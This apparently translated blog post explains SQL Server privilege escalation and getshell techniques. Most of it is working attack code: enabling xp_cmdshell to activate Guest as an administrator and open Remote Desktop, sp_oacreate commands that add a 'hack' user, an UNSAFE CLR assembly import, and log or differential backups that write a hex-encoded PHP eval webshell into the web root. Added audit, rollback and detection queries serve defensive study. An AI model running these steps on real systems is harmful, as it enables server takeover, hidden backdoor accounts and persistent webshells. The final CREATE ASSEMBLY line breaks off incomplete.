SQL Server command injection and getshell

1. MSSQL permission levels

  • sa: database operations, file management, command execution, registry reads, etc. This is the highest privilege level in MSSQL (the sysadmin server role)
  • db_owner: database-administrator level; file management, database operations, etc.
  • public: ordinary database operations; the level a guest user has

Check the current database permission level. Each query returns 1 when the current login holds the role and 0 when it does not.

Check for the sa (sysadmin) role

select is_srvrolemember('sysadmin')

Check for the db_owner role

select is_member('db_owner')

Check for the public role

select is_srvrolemember('public')
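The checks above only tell you about the current login. The audit below is an added example (not from the original post) that lists every account that would answer 1 to them: members of the sysadmin server role and members of db_owner in each database. It uses the undocumented sp_MSforeachdb, which substitutes ? with each database name, in the same way the post later uses sp_MSforeachtable.

```sql
-- Added audit example, not from the original post. sysadmin members can switch on
-- xp_cmdshell, OLE Automation and CLR; db_owner is enough for the backup-to-disk
-- write primitive, so both lists should be short and reviewed regularly.

-- 1. Server level: every member of the fixed server role sysadmin
SELECT r.name        AS server_role,
       m.name        AS member_name,
       m.type_desc   AS member_type,      -- SQL_LOGIN, WINDOWS_LOGIN, WINDOWS_GROUP ...
       m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals   AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = N'sysadmin'
ORDER BY m.name;

-- 2. Database level: members of db_owner in each database, plus the login that
--    owns the database (the owner maps to dbo and is implicitly db_owner).
--    Three-part names avoid a USE statement inside the per-database command.
CREATE TABLE #db_owners (database_name sysname, member_name sysname, member_type nvarchar(60));

EXEC sp_MSforeachdb N'
INSERT INTO #db_owners (database_name, member_name, member_type)
SELECT N''?'', m.name, m.type_desc
FROM [?].sys.database_role_members AS rm
JOIN [?].sys.database_principals  AS r ON r.principal_id = rm.role_principal_id
JOIN [?].sys.database_principals  AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = N''db_owner'';';

SELECT d.name                    AS database_name,
       SUSER_SNAME(d.owner_sid)  AS owner_login,     -- the login behind dbo
       o.member_name,
       o.member_type
FROM sys.databases AS d
LEFT JOIN #db_owners AS o ON o.database_name = d.name
ORDER BY d.name, o.member_name;

DROP TABLE #db_owners;
```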

2. MSSQL default databases

  • master: controls all aspects of SQL Server. It holds the configuration information, login information and the state of what is currently running on the server
  • model: the template from which every new user database is created
  • msdb: a special case. It is technically a user database; the difference is how SQL Server uses it. All job scheduling, alerts and operators are stored in msdb, and it also stores the full backup history
  • tempdb: a very special database shared by every user who accesses the server. It holds all temporary tables, temporary stored procedures and other temporary objects created by SQL Server. Never create a permanent table in it

3. Common database statements

select @@version;       #Query the database version
select @@servername;    #Query the server name
select host_name();     #Query the host name of the connecting client. When connecting remotely with Navicat, this is the client machine's name
select db_name();       #Query the current database name
select db_name(1);      #Query the name of the first database
select db_name(2);      #Query the name of the second database
select user;            #Query the current database user. The result is dbo, the default user of every database, which has owner permissions. Its full name is databaseOwner (DbOwner)
use tempdb              #Switch to the tempdb database
top n                   #Return the first n rows
offset 1 rows fetch next 3 rows only   #Return 3 rows starting from the second row, i.e. rows 2, 3 and 4 (needs an order by; SQL Server has no LIMIT clause)
select substring('string',2,1)     #Take 1 character starting at position 2 (1-based) of the given string
select ascii('a')                  #Query the ASCII value of the given character
select len('string')               #Query the length of the given string
EXEC sp_spaceused @updateusage = N'TRUE';  #Query the size of the current database
sp_spaceused 'Table name'                #Query the size of the named table
EXEC master.sys.xp_dirtree '\\192.168.106.5\xx.txt',0,1;   #List the directory tree of the given path


#Database connection
server=127.0.0.1;UID=sa;PWD=123456;database=master;Provider=SQLOLEDB
mssql://sa:123456@127.0.0.1/XCCMS_SocialBusinessDB
 
In the queries below, count(name) returns the total number of matching rows,
name returns only the names, and * returns the full details
 
#Query databases
select count(name) from sysdatabases     #Query the number of databases. This command can be executed only when the current database is master
select name  from sysdatabases           #Query the database names
select * from sysdatabases               #Query the details of all databases

#Query tables
select count(name) from sysobjects where type='U' #Query the number of tables in the current database
select name from sysobjects where type='U'  #Query the names of all tables in the current database
select * from sysobjects where type='U'    #Query the details of all tables in the current database

select count(name) from test..sysobjects where xtype='U'  #Query the number of tables in the specified database test
select name from test..sysobjects where xtype='U'         #Query the table names in the specified database test
select * from test..sysobjects where xtype='U'            #Query the table details in the specified database test

#Query columns
select count(name) from syscolumns where id=(select max(id) from sysobjects where xtype='u' and name='users')            #Query the number of columns in the table users of the current database
select name from syscolumns where id=(select max(id) from sysobjects where xtype='u' and name='users')         #Query the names of all columns in the table users of the current database
select * from syscolumns where id=(select max(id) from sysobjects where xtype='u' and name='users')      #Query the column details of the table users of the current database

select count(name) from test..syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')     #Query the number of columns in the table users of the specified database test
select name from test..syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')       #Query the names of all columns in the table users of the specified database test
select * from test..syscolumns where id=(select max(id) from test..sysobjects where xtype='u' and name='users')       #Query the column details of the table users of the specified database test

Query the size of all tables in the current database

declare  @table_spaceused table     	#Declare a table variable (declare @name table (columns)); its columns match the result set of sp_spaceused
(name   nvarchar(100)
,rows   int
,reserved   nvarchar(100)
,data   nvarchar(100)
,index_size nvarchar(100)
,unused nvarchar(100)
)

insert into @table_spaceused
(name,rows,reserved,data,index_size,unused )
exec sp_MSforeachtable
@command1='exec sp_spaceused ''?'''

select * from @table_spaceused

4. Enable xp_cmdshell with SA permission to obtain command execution on the host

  1. Check whether xp_cmdshell is enabled
select count(*) FROM master..sysobjects Where xtype = 'X' AND name = 'xp_cmdshell'  


A return value of 1 means enabled; 0 means disabled

  2. If xp_cmdshell is not enabled, we can execute the following commands to enable it. The following four steps turn on xp_cmdshell
execute('sp_configure "show advanced options",1')  #Set this option's value to 1
execute('reconfigure')                             #Save the setting
execute('sp_configure "xp_cmdshell", 1')           #Set the value of xp_cmdshell to 1
execute('reconfigure')                             #Save the setting
execute('sp_configure')                            #View the configuration
execute('xp_cmdshell "whoami"')                    #Execute a system command
 
or
exec sp_configure 'show advanced options',1;       
reconfigure;                                       
exec sp_configure 'xp_cmdshell',1;                 
reconfigure;                                      
exec sp_configure;                                 
exec xp_cmdshell 'whoami';                         
 
 
Once system commands can be executed, the following work provided the service account obtained is in the local administrators group
exec xp_cmdshell 'net user Guest 123456'              #Set a password for the Guest user
exec xp_cmdshell 'net user Guest /active:yes'         #Activate the Guest user
exec xp_cmdshell 'net localgroup administrators Guest /add'  #Add the Guest user to the administrators group
exec xp_cmdshell 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'        #Open port 3389 (enable Remote Desktop)

  3. Even when the check in step 1 returns 1, the command may still fail to execute with execute('xp_cmdshell "whoami"'), because xp_cmdshell is disabled by default

  4. In that case, run the execute() sequence from step 2 above to turn xp_cmdshell on

5. Using sp_oacreate with SA permission to execute system commands

  1. Precondition for sp_oacreate: the SQL Server service has not been run with reduced (downgraded) privileges

    We can use the COM component interface sp_oacreate in SQL Server to execute system commands.

  2. The following commands test whether sp_oacreate is allowed

    declare @shell int 
    exec sp_oacreate 'wscript.shell',@shell output 
    exec sp_oamethod @shell,'run',null,'whoami'
    

  3. Turn on sp_oacreate

    EXEC sp_configure 'show advanced options', 1;    
    	-- equivalent to execute('sp_configure "show advanced options",1')
    RECONFIGURE WITH OVERRIDE;  
    EXEC sp_configure 'Ole Automation Procedures', 1;  
    RECONFIGURE WITH OVERRIDE;
    

  4. Note that sp_oacreate gives no output (no echo), so test it with a command whose effect can be observed

    -- Execute the add-user command as a test
    declare @shell int 
    exec sp_oacreate 'wscript.shell',@shell output 
    exec sp_oamethod @shell,'run',null,
    'c:\windows\system32\cmd.exe /c net user hack Password@ /add'   
    	-- the SQL statements above are fixed boilerplate; the last line is the system command that is run
    

6. Using CLR with SA permission to execute system commands

There are two ways to create a CLR:

  • Create from a DLL file
  • Create from the file's hexadecimal byte stream

  1. Enable the CLR function
exec sp_configure 'show advanced options', 1;
RECONFIGURE;
Exec sp_configure 'clr enabled', 1;
RECONFIGURE;
-- If there is a permission problem, execute the following commands
alter database [master] set TRUSTWORTHY on  -- an UNSAFE assembly is imported below, so the database must be marked trustworthy
EXEC sp_changedbowner 'sa'

--Import assembly
CREATE ASSEMBLY [WarSQLKit] 
	AUTHORIZATION [dbo] FROM <hexadecimal assembly data> 
	WITH PERMISSION_SET = UNSAFE;
CREATE PROCEDURE sp_cmdExec @Command [nvarchar](4000) WITH EXECUTE AS CALLER 
	AS EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec;

-- Execute a command through the procedure created above, for example:
EXEC sp_cmdExec 'whoami';

-- Delete assembly
DROP PROCEDURE sp_cmdExec;
DROP ASSEMBLY [WarSQLKit];
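Sections 4, 5 and 6 all rely on server options that are off by default. The following audit and rollback script is an added example, not the post's own code: it reports those options, the TRUSTWORTHY flag and owner the CLR route depends on, and any non-SAFE user assembly such as the post's WarSQLKit, then turns the options back off. It assumes sysadmin rights; the 'clr strict security' row only exists on SQL Server 2017 and later.

```sql
-- Added audit and rollback example, not from the original post.

-- 1. Dangerous server options: on a hardened server every value_in_use here is 0
--    (clr strict security, where present, should be 1)
SELECT name, value_in_use, value AS pending_value
FROM sys.configurations
WHERE name IN (N'show advanced options', N'xp_cmdshell',
               N'Ole Automation Procedures', N'clr enabled',
               N'clr strict security')
ORDER BY name;

-- 2. TRUSTWORTHY databases and their owners. The post sets TRUSTWORTHY on and
--    changes the owner to sa, which lets an UNSAFE assembly run as sysadmin;
--    compare the list with a clean install (msdb ships with the flag on).
SELECT name, is_trustworthy_on, SUSER_SNAME(owner_sid) AS owner_login
FROM sys.databases
WHERE is_trustworthy_on = 1;

-- 3. User assemblies loaded with EXTERNAL_ACCESS or UNSAFE in the current
--    database, with the procedures bound to them (the post's
--    WarSQLKit.StoredProcedures.CmdExec would appear here as sp_cmdExec)
SELECT a.name              AS assembly_name,
       a.permission_set_desc,
       a.create_date,
       o.name              AS bound_procedure,
       m.assembly_class, m.assembly_method
FROM sys.assemblies AS a
LEFT JOIN sys.assembly_modules AS m ON m.assembly_id = a.assembly_id
LEFT JOIN sys.objects          AS o ON o.object_id   = m.object_id
WHERE a.is_user_defined = 1
  AND a.permission_set_desc <> N'SAFE_ACCESS';

-- 4. Rollback: disable the features the post enabled. 'show advanced options'
--    must still be 1 while the first three run; each change needs RECONFIGURE.
EXEC sp_configure N'xp_cmdshell', 0;
EXEC sp_configure N'Ole Automation Procedures', 0;
EXEC sp_configure N'clr enabled', 0;
RECONFIGURE;
EXEC sp_configure N'show advanced options', 0;
RECONFIGURE;
-- ALTER DATABASE [<db>] SET TRUSTWORTHY OFF;   -- for each user database found in step 2
```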

7. Getshell via LOG backup with DB_owner permission

Whether via LOG backup or differential backup, the idea is to write a one-line webshell (a "one-sentence Trojan") into the file produced by the backup

  1. Common backup strategies for SQL Server

    • Weekly full backup
    • Daily differential backup
    • Hourly transaction-log backup

  2. Preconditions

    • A backup of the database already exists on the target machine. In other words, if we use the test database, a backup of test must already exist, and the recovery model must be FULL
    • The absolute path of the web root is known
    • Stacked queries are supported

  3. Injection code

    alter database <Database name> set RECOVERY FULL;   #Set the database recovery model to FULL
    create table cmd (a image);        		#Create a table cmd with a single column a of type image
    backup log <Database name> to disk= 'C:\phpstudy\WWW\1.php' with init;  #Back up the log to the given path
    
    insert into cmd (a) values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e);  
    	#Insert the one-liner into table cmd; the hex decodes to <?php @eval($_POST['x']);?>
    	
    backup log <Database name> to disk='C:\phpstudy\WWW\2.php';   	#Back up the log, which now contains the inserted row, to the given file
    drop table cmd;    										#Drop the cmd table
    
  4. Overview

    Using a log backup is similar to MySQL's technique of writing a one-line webshell into the log file.

    Set the database recovery model to FULL, then create a table and run a backup to the specified path.

    Insert the one-liner into the table, back up the log to the path we know, and finally drop the created table.

8. Getshell via differential backup with DB_owner permission

Differential backup may crash the website and is not recommended

  1. Preconditions

    • The absolute path of the web root is known
    • Stacked queries are supported

  2. Injection code

    create table [dbo].[test] ([cmd] [image])    -- Create table dbo.test with one column cmd of type image
    
    declare @a sysname,@s nvarchar(4000) 
    	select @a=db_name(),@s='xie' backup log @a to disk = @s 
    	with init,no_truncate              -- Initial backup (the file name xie is the author's choice)
    
    insert into [test](cmd) values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e)
        -- Insert the one-liner into column cmd of table test
        
    declare @a sysname,@s nvarchar(4000) select 	@a=db_name(),@s=0x43003A005C00700068007000730074007500640079005C005700570057005C007300680065006C006C002E00700068007000 backup log @a to disk=@s with init,no_truncate
    	-- Back up the log to the specified file
    
    Drop table [test]   		 -- Drop the test table
    
    • In the third statement, 0x3c3f70687020406576616c28245f504f53545b785d293b3f3e is the hexadecimal representation of the one-liner <?php @eval($_POST[x]);?>
    • In the fourth statement, 0x43003A005C00700068007000730074007500640079005C005700570057005C007300680065006C006C002E00700068007000 is the hexadecimal (UTF-16LE, because @s is nvarchar) representation of C:\phpstudy\WWW\shell.php
  3. Summary

    Uses a data differential backup. Similar to the LOG backup above, but the database recovery model is not set to FULL.

    When we insert the one-liner into the table, it is recorded in the log, so the log (and therefore the backup written from it) contains the one-liner.
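Both backup variants in sections 7 and 8 leave a row in msdb's backup history, which is the simplest place to detect them. The query below is an added example, not from the original post: it lists recent LOG or DIFFERENTIAL backups written to a disk file outside the sanctioned backup directory, with a script extension, or under a web root. The directory, path patterns and 30-day window are assumptions to adjust per environment; reading msdb's backup tables needs the db_backupoperator role or equivalent.

```sql
-- Added detection example, not from the original post. Flags backups of the two
-- types the post's techniques produce whose destination looks like a web file.
DECLARE @lookback_days int = 30;
DECLARE @backup_dir nvarchar(260) = N'D:\Backups\';   -- assumed sanctioned location

SELECT bs.database_name,
       bs.backup_start_date,
       CASE bs.type WHEN 'D' THEN 'FULL'
                    WHEN 'I' THEN 'DIFFERENTIAL'
                    WHEN 'L' THEN 'LOG'
                    ELSE bs.type END        AS backup_type,
       bs.recovery_model,                   -- the log variant first forces FULL
       bs.user_name                         AS executed_by,
       bs.backup_size                       AS size_bytes,   -- a shell backup is tiny
       bmf.physical_device_name             AS destination
FROM msdb.dbo.backupset AS bs
JOIN msdb.dbo.backupmediafamily AS bmf
  ON bmf.media_set_id = bs.media_set_id
WHERE bs.backup_start_date >= DATEADD(day, -@lookback_days, GETDATE())
  AND bs.type IN ('I', 'L')                                  -- differential / log only
  AND bmf.device_type = 2                                    -- 2 = disk file
  AND (   bmf.physical_device_name NOT LIKE @backup_dir + N'%'  -- outside the sanctioned dir
       OR bmf.physical_device_name LIKE N'%.php'                 -- script extension instead of .bak/.trn
       OR bmf.physical_device_name LIKE N'%.asp'
       OR bmf.physical_device_name LIKE N'%.aspx'
       OR bmf.physical_device_name LIKE N'%.jsp'
       OR bmf.physical_device_name LIKE N'%\WWW\%'               -- web roots (phpstudy layout from the post)
       OR bmf.physical_device_name LIKE N'%\wwwroot\%')
ORDER BY bs.backup_start_date DESC;
```

If backups legitimately go to several directories, drop the NOT LIKE clause and keep only the extension and web-root patterns.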

Supplemental CLR import assembly

CREATE ASSEMBLY [WarSQLKit] AUTHORIZATION [dbo] FROM 

Tags: Database SQL injection SQL Server

Posted by I Am Chris on Mon, 24 Jan 2022 03:59:38 +1030